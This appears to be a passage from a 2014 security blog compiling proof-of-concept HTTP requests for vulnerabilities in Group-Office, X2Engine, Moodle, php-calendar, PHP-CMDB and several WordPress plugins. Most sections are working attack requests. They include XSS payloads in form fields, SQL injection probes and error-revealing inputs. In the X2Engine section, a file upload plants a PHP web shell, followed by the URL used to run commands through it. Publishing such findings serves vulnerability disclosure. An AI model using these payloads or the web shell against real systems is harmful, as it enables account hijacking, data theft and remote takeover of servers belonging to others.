# Home ....| https://www.group-office.com/
# ==============================================================


# ==============================================================
# 1. XSS


---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=tasks/portlet/portletGrid&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

sort='><body onload=alert(123)>&dir=ASC&groupBy=tasklist_name&groupDir=ASC&security_token=PRWJsDvCpVw4kElX2zBN
---<request>---



# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=tasks/task/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

task=task&tmp_files=&id=0&security_token=PRWJsDvCpVw4kElX2zBN&name=asdasd&link=<body onload=alert(123)>&start_time=27-02-2014&due_time=27-02-2014&status=NEEDS-ACTION&percentage_complete=0&tasklist_id=3&category_id=&priority=1&description=&interval=1&freq=&col_9=
---<request>---



# ==============================================================
# 3. XSS

---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=files/folder/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

parent_id=36&security_token=PRWJsDvCpVw4kElX2zBN&name=<body onload=alert(123)>
---<request>---




# ==============================================================
# 4. XSS

---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=settings/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

tmp_files=&id=3&security_token=PRWJsDvCpVw4kElX2zBN&language=<body onload=alert(123)>&timezone=Asia%2FJakarta&dateformat=-%3AdmY&time_format=H%3Ai&first_weekday=1&holidayset=en&thousands_separator=%2C&decimal_separator=.&currency=%E2%82%AC&list_separator=%3B&text_separator=%22&theme=Group-Office&start_module=summary&max_rows_list=30&sort_name=last_name&mute_sound=0&mute_reminder_sound=0&mute_new_mail_sound=0&popup_reminders=0&mail_reminders=0&show_smilies=1&auto_punctuation=0&current_password=&password=&passwordConfirm=&first_name=Demo&middle_name=&last_name=User&title=&suffix=&initials=&sex=M&birthday=&department=&function=CEO&email=demo%40acmerpp.demo&email2=&email3=&home_phone=&fax=&cellular=06-12345678&work_phone=&work_fax=&address=1111%20Broadway&address_no=&zip=10019&city=New%20York&state=NY&country=US&use_html_markup=on&font_size=12px&comments_enable_read_more=0&reminder_value=&reminder_multiplier=60&background=EBF1E2&default_calendar_id=3&show_statuses=1&default_tasklist_id=3
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] PHP Ticket System SQL Injection

# ==============================================================
# Title ...| PHP Ticket System SQL Injection
# Version .| BETA_1.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net/projects/phpticketsystem/
# ==============================================================


# ==============================================================
# SQL Injection

---<request>---
GET /k/cms/beta/mods/tickets/data/get_all_created_by_user.php?id='mynameissqli&sort%5B0%5D%5Bfield%5D=undefined&sort%5B0%5D%5Bdir%5D=desc HTTP/1.1
Host: 10.149.14.62
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/ 





* UPDATE *
I've just got a nice news from PacketStormSecurity 
that this vulnerability was already found by someone else. 

Thanks! ;) 

[EN] Multiple vulnerabilities in X2Engine

# ==============================================================
# Title ...| Multiple vulnerabilities in X2Engine
# Version .| X2Engine 3.7.3
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================

[+] For admin logged in

# ==============================================================
# 1. SQL Injection

---<request>---
GET /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/profile/getEvents?lastEventId='mynameissqli&lastTimestamp=0&profileId=1&myProfileId=1 HTTP/1.1
Host: 10.149.14.62
(...)
Connection: close
---<request>---


Parameter "lastTimestamp" is also vulnerable.


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/contacts/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 917

Contacts%5BfirstName%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&Contacts%5Btitle%5D=tester&Contacts%5Bphone%5D=&Contacts%5Bphone2%5D=&Contacts%5BdoNotCall%5D=0&Contacts%5BlastName%5D=tester&Contacts%5Bcompany_id%5D=&Contacts%5Bcompany%5D=&Contacts%5Bwebsite%5D=&Contacts%5Bemail%5D=&Contacts%5BdoNotEmail%5D=0&Contacts%5Bleadtype%5D=&Contacts%5BleadSource%5D=&Contacts%5Bleadstatus%5D=&Contacts%5BleadDate%5D=&Contacts%5Binterest%5D=&Contacts%5Bdealvalue%5D=%240.00&Contacts%5Bclosedate%5D=&Contacts%5Bdealstatus%5D=&Contacts%5Baddress%5D=&Contacts%5Baddress2%5D=&Contacts%5Bcity%5D=&Contacts%5Bstate%5D=&Contacts%5Bzipcode%5D=&Contacts%5Bcountry%5D=&Contacts%5BbackgroundInfo%5D=&Contacts%5Bskype%5D=&Contacts%5Blinkedin%5D=&Contacts%5Btwitter%5D=&Contacts%5Bfacebook%5D=&Contacts%5Bgoogleplus%5D=&Contacts%5BotherUrl%5D=&Contacts%5BassignedTo%5D=admin&Contacts%5Bpriority%5D=&Contacts%5Bvisibility%5D=1&yt0=Create
---<request>---

Also vulnerable: Contacts%5Bwebsite%5D, Contacts%5Bcompany%5D, Contacts%5Binterest%5D...


# ==============================================================
# 3. Arbitrary File Upload


---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---

To access shell, go to:
http://10.149.14.62/(...)/X2Engine-3.7.3/x2engine/uploads/media/admin/mishell.php?cmd=id



# ==============================================================
# 4. DOM-based XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum='');</script><script>alert(1)</script>&langCode=en HTTP/1.1
Host: 10.149.14.62
(...) <!-- yes, I know. This is the same request as [3] ;)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---



# ==============================================================
# 5. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/docs/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 260

Docs%5Bname%5D='%3e"%3e%3cbody%2fonload%3dalert(991212129)%3e&Docs%5Bvisibility%5D=1&yt0=Create&Docs%5Btext%5D=%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%09%3Ctitle%3E%3C%2Ftitle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3Eaaaaaaaaaaaaaaaa%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A
---<request>---




# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] VideoWhisper Video Conference XSS

# ==============================================================
# Title ...| VideoWhisper Video Conference XSS
# Version .|
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/cms/vc/vc_php/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 43

r='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Multiple vulnerabilities in PHP-CMDB

# ==============================================================
# Title ...| Multiple vulnerabilities in PHP-CMDB
# Version .| php-cmdb_0.7.3
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================

[+] From admin logged-in


# ==============================================================
# 1. XSS in SQL error

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 57

s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_form=1
---<request>---


---<response>---
<td colspan='2' class='c_attr r_attr'>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(9999)>%' AND ci_cit_id=cit_id ORDER BY ci_title, cit_title' at line 1</td>
</tr>
---<response>---

Same parameter seems to be vulnerable to SQL Injection attack.
("The used SELECT statements have a different number of columns")

# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/ci_create.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 93

ci_id=0&ci_clone_id=0&ci_icon='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&ci_form=1&ci_cit_id=0
---<request>---



# ==============================================================
# 3. XSS /SQLi

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/search_advanced.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 100

s_form=2&s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_cit_id=0&s_cat_id=0&s_compare_operator=0
---<request>---


# ==============================================================
# 4. XSS / SQLi

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/u_create_run.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 153

u_id=0&u_form=1&u_login='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&u_active=1&u_last_name=tester&u_first_name=tester&u_role_id=1&u_email=&u_auth_backend=0
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Multiple vulnerabilities in php-calendar 2.0.1

# ==============================================================
# Title ...| PHP Calendar Multiple vulnerabilities
# Version .| php-calendar-2.0.1.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net
# ==============================================================

[+] As guest

# ==============================================================
# 1. Information disclosure bug

---<request>---
GET /k/cms/phpcalendar/php-calendar-2.0.1/index.php?action='`"%3b--#%%2f%2a&year=2014&month=1&day=28 HTTP/1.1
Host: 10.149.14.62
---<request>---

---<response>---
<pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(676): soft_error('Invalid action')
#1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action()
#2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc()
#3 {main}</pre>
---<response>---



# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

lasturl='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&action=login&submit=Log+in&username=admin&password=asd
---<request>---



# ==============================================================
# 3. Information disclosure bug

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 132

action=search&phpcid=1&searchstring=asdasd&search-from-date='`"%3b--#%%2f%2a&search-to-date=02%2F21%2F2014&sort=start_date&order=ASC

---<request>---


---<response>---
<div class="phpc-main"><h2>Error</h2>
<p>Malformed &quot;search-from&quot; date: &quot;\'`\&quot;;--#%/*&quot;</p>
<h3>Backtrace</h3>
<pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(843): soft_error('Malformed &quot;sear...')
#1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(31): get_timestamp('search-from')
#2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(129): search_results()
#3 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680) : eval()'d code(1): search()
#4 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680): eval()
#5 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action()
#6 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc()
#7 {main}</pre>
---<response>---

# ==============================================================
# [+] From admin logged-in

# ==============================================================
# 4. Persistent XSS

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 197

phpc_token=ALRTjtU1Qnv0LMm1G_BeiQSEUyGGHPYGrGMk8L6sfaI&action=user_create&submit_form=submit_form&submit=Submit&user_name='%3e"%3e%3cbody%2fonload%3dalert(123123)%3e&password1=aaaaa&password2=aaaaa
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Moodle 2.6.1 XSS

During last tests I found that latest version of Moodle is vulnerable to XSS.

Check it out:

# ==============================================================
# Title ...| Moodle 2.6.1 XSS
# Version .| (Feb 27  2014) moodle-latest-26.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://download.moodle.org
# ==============================================================

[+] From admin user:

# ==============================================================
# 1. Persistent XSS

---<request>---
POST /k/cms/moodle/course/edit.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 988

returnto=topcat&mform_isexpanded_id_descriptionhdr=1&addcourseformatoptionshere=&enablecompletion=0&id=&sesskey=TCxmENhHwt&_qf__course_edit_form=1&mform_isexpanded_id_general=1&mform_isexpanded_id_courseformathdr=0&mform_isexpanded_id_appearancehdr=0&mform_isexpanded_id_filehdr=0&mform_isexpanded_id_enrol_guest_header_0=0&mform_isexpanded_id_groups=0&mform_isexpanded_id_rolerenaming=0&fullname=startowy&shortname=startowy&category=1&visible=1&startdate%5Bday%5D=28&startdate%5Bmonth%5D=2&startdate%5Byear%5D=2014&idnumber=&summary_editor%5Btext%5D=%3Cp%3Estartowy%3C%2Fp%3E&summary_editor%5Bformat%5D=1&summary_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&overviewfiles_filemanager=41075595&format=weeks&numsections=10&hiddensections=0&coursedisplay=0&lang=&newsitems=5&showgrades=1&showreports=0&maxbytes=0&enrol_guest_status_0=1&groupmode=0&groupmodeforce=0&defaultgroupingid=0&role_1=&role_2=&role_3=&role_4=&role_5=&role_6=&role_7=&role_8=&submitbutton=Save+changes
---<request>---


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/moodle/group/group.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 361

id=&courseid=5&sesskey=cik7wECmff&_qf__group_form=1&mform_isexpanded_id_general=1&name=aaaaaaaaaaaaaa&idnumber=&description_editor%5Btext%5D=%3Cp%3Eaaaaaaaaaaaaaaaaaaaaaaa%3C%2Fp%3E&description_editor%5Bformat%5D=1&description_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&enrolmentkey=&hidepicture=0&imagefile=801633198&submitbutton=Save+changes
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Wednesday, 26 February 2014

[EN] Multiple XSS in mp3-jplayer

# ==============================================================
# Title ...| Multiple XSS in mp3-jplayer
# Version .| mp3-jplayer.1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# Multiple XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=mp3jplayer.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1441

mp3foxVol=100&make_player_from_link=true&mp3foxOnBlog=true&mp3foxTheme=styleF&mp3foxCustomStylesheet='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&mp3foxScreenOpac=&mp3foxScreenColour=&mp3foxLoadbarOpac=&mp3foxLoadbarColour=&mp3foxPosbarOpac=&mp3foxPosbarColour=&mp3foxPosbarTint=&mp3foxPlaylistOpac=&mp3foxPlaylistColour=&mp3foxPlaylistTint=&mp3foxIndicator=&mp3foxVolGrad=&mp3foxListDivider=&mp3foxScreenTextColour=&mp3foxListTextColour=&mp3foxListCurrentColour=&mp3foxListBGaCurrent=&mp3foxListHoverColour=&mp3foxListBGaHover=&mp3foxPopoutBackground=&mp3foxPopoutBGimage=&librarySortcol=file&libraryDirection=ASC&mp3foxfolder=%2F&mp3foxPlayerWidth=40%25&mp3foxFloat=none&mp3foxDownloadMp3=false&loggedout_dload_text=LOG+IN+TO+DOWNLOAD&loggedout_dload_link=http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-login.php&dload_text=DOWNLOAD+MP3&force_browser_dload=true&dloader_remote_path=&mp3foxPaddings_top=5px&mp3foxPaddings_inner=35px&mp3foxPaddings_bottom=40px&mp3foxMaxListHeight=450&mp3foxShowPlaylist=true&file_separator=%2C&caption_separator=%3B&mp3foxEnablePopout=true&mp3foxPopoutWidth=400&mp3foxPopoutMaxHeight=600&mp3foxPopoutButtonText=&mp3foxEncodeFiles=true&mp3foxAllowRemote=true&make_player_from_link_shcode=%5Bmp3j+track%3D%22%7BTEXT%7D%40%7BURL%7D%22+volslider%3D%22y%22+style%3D%22outline%22%5D&touch_punch_js=true&disableJSlibs=&update_mp3foxSettings=Update+Settings&mp3foxRemember=true&MtogBox1=false&mp3foxPluginVersion=1.8.7
---<request>---

Also vulnerable:
mp3foxScreenOpac, mp3foxScreenColour, mp3foxLoadbarOpac, mp3foxLoadbarColour, mp3foxPosbarOpac, mp3foxPosbarColour,
mp3foxPlaylistOpac, mp3foxPlaylistColour, mp3foxScreenTextColour, mp3foxListTextColour, mp3foxListCurrentColour, mp3foxListBGaCurrent, mp3foxListBGaCurrent, mp3foxListHoverColour, mp3foxListBGaHover, mp3foxPopoutBackground,
mp3foxPopoutBGimage, mp3foxPlayerWidth, mp3foxPlayerWidth, loggedout_dload_text, loggedout_dload_link, dload_text,
dloader_remote_path, mp3foxPaddings_top, mp3foxPaddings_inner, mp3foxPaddings_bottom,  file_separator, caption_separator, mp3foxPopoutButtonText, make_player_from_link_shcode, MtogBox1


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in PrintFriendly

# ==============================================================
# Title ...| XSS in PrintFriendly
# Version .| printfriendly 3.3.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1389

option_page=printfriendly_option&action=update&_wpnonce=496ce7c4d4&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dprintfriendly&printfriendly_option%5Bbutton_type%5D=pf-button.gif&printfriendly_option%5Bcustom_image%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&printfriendly_option%5Bcustom_text%5D=Print+Friendly&printfriendly_option%5Btext_color%5D=%236D9F00&printfriendly_option%5Btext_size%5D=14&printfriendly_option%5Bcontent_position%5D=left&printfriendly_option%5Bcontent_placement%5D=after&printfriendly_option%5Bmargin_left%5D=12&printfriendly_option%5Bmargin_right%5D=12&printfriendly_option%5Bmargin_top%5D=12&printfriendly_option%5Bmargin_bottom%5D=12&printfriendly_option%5Bshow_on_posts%5D=on&printfriendly_option%5Bshow_on_pages%5D=on&printfriendly_option%5Blogo%5D=favicon&printfriendly_option%5Bimage_url%5D=&printfriendly_option%5Btagline%5D=&printfriendly_option%5Bclick_to_delete%5D=0&printfriendly_option%5Bhide-images%5D=0&printfriendly_option%5Bimage-style%5D=right&printfriendly_option%5Bemail%5D=0&printfriendly_option%5Bpdf%5D=0&printfriendly_option%5Bprint%5D=0&printfriendly_option%5Bcustom_css_url%5D=&printfriendly_option%5Bwebsite_protocol%5D=http&printfriendly_option%5Bpassword_protected%5D=no&printfriendly_option%5Bjavascript%5D%3E=yes&printfriendly_option%5Benable_google_analytics%5D=no&printfriendly_option%5Bpf_algo%5D=wp
---<request>---

Also vulnerable: printfriendly_option%5Bcustom_text%5D



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in Alpine PhotoTile for Instagram

# ==============================================================
# Title ...| XSS in Alpine PhotoTile for Instagram
# Version .| Alpine PhotoTile for Instagram 1.2.6.5
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=plugin-settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 300

hidden=Y&general_highlight_color=%2364a2d8&general_lightbox=alpine-fancybox&general_lightbox_params='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&general_block_users=&hidden_widget_alignment=1&cache_time=4&alpine-photo-tile-for-instagram-settings_plugin-settings%5Bsubmit-plugin-settings%5D=Save+Settings
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in Widget Control Powered By Everyblock

# ==============================================================
# Title ...| XSS in Widget Control Powered By Everyblock
# Version .| widget-control-powered-by-everyblock.1.0.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/admin.php?page=add-widget-slug HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 52

idDropdown='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e
---<request>---  

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in BSK PDF Manager

# ==============================================================
# Title ...| XSS in BSK PDF Manager
# Version .| bsk-pdf-manager 1.3
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/admin.php?page=bsk-pdf-manager&view=addnew HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 302

page=bsk-pdf-manager&view='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&cat_title=asdasd&bsk_pdf_manager_action=category_save&bsk_pdf_manager_category_id=-1&bsk_pdf_manager_category_save_oper_nonce=9977a95481&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dbsk-pdf-manager%26view%3Daddnew
---<request>---

Also vulnerable is 'category->title'.

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in VideoWhisper Live Streaming

# ==============================================================
# Title ...| XSS in VideoWhisper Live Streaming
# Version .| 4.29.6
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=premium HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 310

premiumList='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&canWatchPremium=all&watchListPremium=Super+Admin%2C+Administrator%2C+Editor%2C+Author%2C+Contributor%2C+Subscriber&pLogo=1&transcoding=1&alwaysRTMP=0&pBroadcastTime=0&pWatchTime=0&timeReset=30&pCamBandwidth=65536&pCamMaxBandwidth=163840&submit=Save+Changes
---<request>---

Also vulnerable: watchListPremium, pBroadcastTime, timeReset, pCamBandwidth


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in WP Post to PDF

# ==============================================================
# Title ...| XSS in WP Post to PDF
# Version .| wp-post-to-pdf.2.3.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 827

option_page=wpptopdf_options&action=update&_wpnonce=578db9a23d&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-post-to-pdf%2Fwp-post-to-pdf.php&wpptopdf%5Bpost%5D=1&wpptopdf%5Bpage%5D=1&wpptopdf%5Binclude%5D=0&wpptopdf%5BexcludeThis%5D=&wpptopdf%5BincludeCache%5D=0&wpptopdf%5BexcludeThisCache%5D=&wpptopdf%5BiconPosition%5D=before&wpptopdf%5BimageIcon%5D=%3Cimg+alt%3D%22Download+PDF%22+src%3D%22http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-content%2Fplugins%2Fwp-post-to-pdf%2Fasset%2Fimages%2Fpdf.png%22%3E&wpptopdf%5BheaderFont%5D=helvetica&wpptopdf%5BheaderFontSize%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&wpptopdf%5BfooterFont%5D=helvetica&wpptopdf%5BfooterFontSize%5D=10&wpptopdf%5BcontentFont%5D=helvetica&wpptopdf%5BcontentFontSize%5D=12&wpptopdf%5Bsubmit%5D=Save+Changes
---<request>---

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Tuesday, 25 February 2014

[EN] Wordpress plugin Zedity vulnerable to XSS

# ==============================================================
# Title ...| Zedity XSS
# Version .| zedity.2.4.0
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---

POST /k/wordpress/wp-admin/admin-ajax.php?action=zedity_ajax HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

zaction=<body onload=alert(123)>&id=&post_id=28&title=aaaaaaa&content=%3Cdiv+data-
origh%3D%22600%22+data-origw%3D%22600%22+style%3D%22position%3A+relative%3B+width%
3A+600px%3B+height%3A+600px%3B+overflow%3A+hidden%3B%22+class%3D%22zedity-editor+z
edity-notheme%22+id%3D%22zed_olgrv8%22%3E%3Cdiv+class%3D%22zedity-watermark%22+sty
le%3D%22display%3Anone%3Btop%3A0%3Bleft%3A0%3B%22+data-pos%3D%22none%22%3E%3Cspan+
style%3D%22color%3A%23ffd6ba%3Bfont-size%3A11px%3Bfont-family%3ATahoma%2CArial%2Cs
ans-serif%22%3EPowered+by+%3Ca+href%3D%22http%3A%2F%2Fzedity.com%22+target%3D%22_b
lank%22+style%3D%22font-size%3A11px%3Bfont-weight%3Abold%3Bcolor%3Awhite%3Bfont-fa
mily%3AVerdana%2CTahoma%3Btext-decoration%3Anone%3B%22%3EZedity%3C%2Fa%3E%3C%2Fspa
n%3E%3C%2Fdiv%3E%3C%2Fdiv%3E

---<request>---

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Wordpress plugin EasyMedia Gallery vulnerable

# ==============================================================
# Title ...|EasyMedia Gallery XSS
# Version .| easy-media-gallery.1.2.29
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# EasyMedia Gallery XSS

---<request>---

POST /k/wordpress/wp-admin/edit.php?post_type=easymediagallery&page=emg_settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1452

option_page=easy_options_group&action=update&_wpnonce=e4392a9119&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Deasymediagallery%26page%3Demg_settings&easymedia_columns=3&easymedia_alignstyle=Center&easymedia_img_size_limit='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&easymedia_vid_size%5Bwidth%5D=700&easymedia_vid_size%5Bheight%5D=400&easymedia_disen_autoplv=1&easymedia_disen_autopl=1&easymedia_disen_audio_loop=1&easymedia_audio_vol=100&easymedia_box_style=Light&easymedia_cur_style=Pointer&easymedia_mag_icon=Icon-0&easymedia_frm_size%5Bwidth%5D=160&easymedia_frm_size%5Bheight%5D=160&easymedia_frm_col=%23FFFFFF&easymedia_ttl_col=%23C7C7C7&easymedia_brdr_rds=3&easymedia_thumb_col=%23000000&easymedia_hover_opcty=40&easymedia_style_pattern=pattern-01.png&easymedia_disen_bor=1&easymedia_disen_hovstyle=1&save3=Save+Changes&easymedia_disen_plug=1&easymedia_disen_rclick=1&easymedia_disen_databk=1&easymedia_disen_admnotify=1&easymedia_disen_dasnews=1&easymedia_ajax_con_id=%23content&easymedia_plugin_core=core-1.4.5-min&easymedia_plugin_wpinfo=-+WP+Version+%3A+3.8.1%0D%0A-+EMG-Lite+Version+%3A+1.2.29%0D%0A-+Site+URL+%3A+http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%0D%0A-+WP+Multisite+%3A+NO%0D%0A-+PHP+Direct+Access+%3A+YES%0D%0A-+Memory+Limit+%3A+128+MB%0D%0A-+Active+Theme+%3A+Twenty+Fourteen%0D%0A-+Active+Plugins+%3A+%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Easy+Media+Gallery%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Zedity%0D%0A&action=save

---<request>---


Also vulnerable are: easymedia_vid_size%5Bwidth%5D, easymedia_vid_size%5Bheight%5D,
easymedia_frm_size%5Bwidth%5D, easymedia_ttl_col, easymedia_thumb_col,
easymedia_hover_opcty, easymedia_style_pattern, easymedia_ajax_con_id


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/